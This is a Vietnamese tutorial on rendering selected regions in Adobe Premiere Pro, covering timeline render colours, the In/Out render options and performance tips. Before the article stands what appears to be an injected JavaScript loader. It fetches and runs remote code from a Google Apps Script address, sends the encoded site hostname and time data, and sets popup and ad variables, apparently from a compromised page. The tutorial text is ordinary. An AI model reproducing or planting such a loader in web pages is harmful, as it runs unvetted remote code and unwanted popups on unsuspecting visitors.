var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Render vùng được chọn trong Adobe Premiere

Bạn có bao giờ gặp tình trạng giật, lag trong lúc xem Preview trong Premiere chưa? Hay gặp những tình trạng như mất frame hình, hiệu ứng được đưa vào lại không chạy chính xác? Nếu bạn gặp những vấn đề như trên thì Render chính là thứ mà bạn cần đấy. Vậy Render là gì mà nó lại có thể giúp ích được như thế? Hãy đọc bài viết sau đây để tìm hiểu thêm về chức năng Render hữu ích này nhé!

Render là gì? và nó có ý nghĩa như thế nào?

Premiere Pro hoạt động bằng cách tham chiếu truy cập vào các file trong thư mục đã được Import. Nhờ cách này, Premiere giữ được project của bạn ở kích thước nhỏ và dễ quản lý hơn, nhưng nó cũng làm project của bạn không được đồng bộ trong một tệp tin dẫn đến một số lỗi trong quá trình xem preview trong lúc dựng.

Khi bạn thêm video, hiệu ứng hoặc chuyển cảnh vào timeline, Premiere sẽ tự động đồng bộ vào file Previews video, nhưng đây là những phần rời rạc nhau chưa được liên kết thành một tổng thể. Render ở đây có nghĩa là tạo một file Preview hoàn chỉnh được chạy ngầm trong phần mềm nhưng chưa Export – xuất ra ngoài.

Lưu ý: nếu bạn thay đổi một số phần sau khi render, bạn sẽ cần Render lại phần đấy để Premiere Pro tạo lại một file Preview mới. Nếu không có thay đổi nào thì Premiere vẫn ưu tiên sử dụng file Preview được tạo ra nhờ Render với tốc độ và độ phân giải cao nhất.

Lợi ích của việc Render trong dựng phim

  • Giảm giật lag khi đang xem video Preview.
  • Giảm tỷ lệ đứng máy và bị đóng phần mềm Premiere Pro khi dựng.
  • Giúp phần mềm chạy mượt hơn.
  • Tác động và giúp giảm thời gian xuất file.

Các màu sắc trong Render có ý nghĩa như thế nào?

Premiere Pro luôn thông báo và cho bạn biết các phần nào cần được Render thông qua các màu sắc trên timeline trong project.

1. Màu xanh lá – An toàn

Nếu bạn có màu xanh phía trên phần timeline, điều đó có nghĩa cảnh phim ở phần đó đã hoàn chỉnh và được render sẵn bởi Premiere rồi. Bạn có thể xem lại phần đó ở tốc độ tối đa mà không bị giật, lag hay gián đoạn.

2. Màu vàng – Chú ý

Màu vàng có nghĩa là phần video đang chỉnh sửa đó chưa được render và tạo ra bản Preview. Premiere sẽ Render Frame By Frame – từng Frame hình clip, hiệu ứng và chuyển cảnh khi bạn xem Preview phần đó. Màu vàng chỉ xuất hiện với các video, hiệu ứng đơn giản và mức độ ảnh hưởng ít hoặc không ảnh hưởng đến phần Preview.

3. Màu đỏ – Nguy hiểm

Màu đỏ cũng có nghĩa là phần video đang chỉnh sửa đó chưa có file Preview, nhưng không giống như màu vàng, màu đỏ này có nghĩa là đoạn video đó đang chưá rất nhiều hiệu ứng nặng và chắc chắn rằng nó sẽ khiến máy bạn giật – lag liên tục khi xem Preview đoạn đó.

4. Không có màu

Không có màu sắc hiển thị trên timeline chứng tỏ file video bạn đang sử dụng rất nhẹ và Premiere Pro sẽ lấy file gốc Preview luôn mà không cần phải tạo hay Render gì cả.

Làm thế nào để Render trong Premiere Pro?

Bước 1: Xác định vùng cần Render

Đưa Playhead trong Premiere đến điểm bắt đầu của vùng cần Render và nhấn phím I để chọn điểm đó (Mark In). Di chuyển thanh Playhead đến điểm cuối để đánh dấu điểm cuối của vùng cần Render và nhấn phím O (Mark Out).

Nếu bạn làm đồng thời trên timeline và trên Media Preview (vùng xem lại), bạn sẽ thấy trên vùng đó được highlight bởi điểm đầu và cuối (Mark In & Mark Out). Bạn có thể thay đổi vùng chọn bằng cách kéo 2 đầu của vùng chọn đó.

Bước 2: Render vùng được chọn

Khi bạn đã xác định xong vùng cần được Render, bạn có thể tìm thấy phần tùy chỉnh ở Sequence và ở đây chúng ta có 3 tùy chọn khác nhau tương ứng với các chức năng và mục đích sử dụng khác nhau:

  • Render Effect In to Out: hãy dùng cách thức này để Render những phần màu đỏ trên timeline. Tùy chọn Render này được thiết kế riêng cho hiệu ứng, chuyển cảnh và những phần nặng khi dựng.
  • Render In to Out: đây là tùy chọn Render thông dụng đối với phần có màu vàng và màu đỏ, nó sẽ giúp các file Preview một cách nhanh hơn nhưng lại ít hiệu quả với các đoạn có hiệu ứng nặng.
  • Render Audio: Giống với tên gọi của nó, tùy chỉnh này sẽ chỉ Render audio phần đã được chọn. Mặc định của Premiere là không tự động Render các file audio như các file video và cần Render riêng. Hoặc bạn có thể làm theo những bước sau để bật chức năng Render Audio cùng lúc với Video. Bạn vào Edit > Preferences > Audio và chọn vào ô Render audio when rendering video.

Một số Tips hay cho Render Video

  • Để đạt được tốc độ Render nhanh và tối ưu nhất bạn nên đảm bảo rằng card đồ họa – GPU và Ram của mình đạt được cấu hình tối thiểu của Premiere.
  • Sử dụng ổ cứng SSD (Solid State Drive) để lưu trữ các file, tài nguyên edit.
  • Nếu bạn đang Render nhưng bất chợt Cancel thì phần đã được Render trong quá trình ấy vẫn được giữ lại làm file Preview.
  • Render project của bạn thường xuyên có thể giảm thời gian trong việc Export – xuất file Project.
  • Khi bạn xuất file, Premiere sẽ Render và nén file đó lại. Nếu Project của bạn đã Render trước đó, bạn có thể giảm thời gian export bằng cách chọn vào ô Use Previews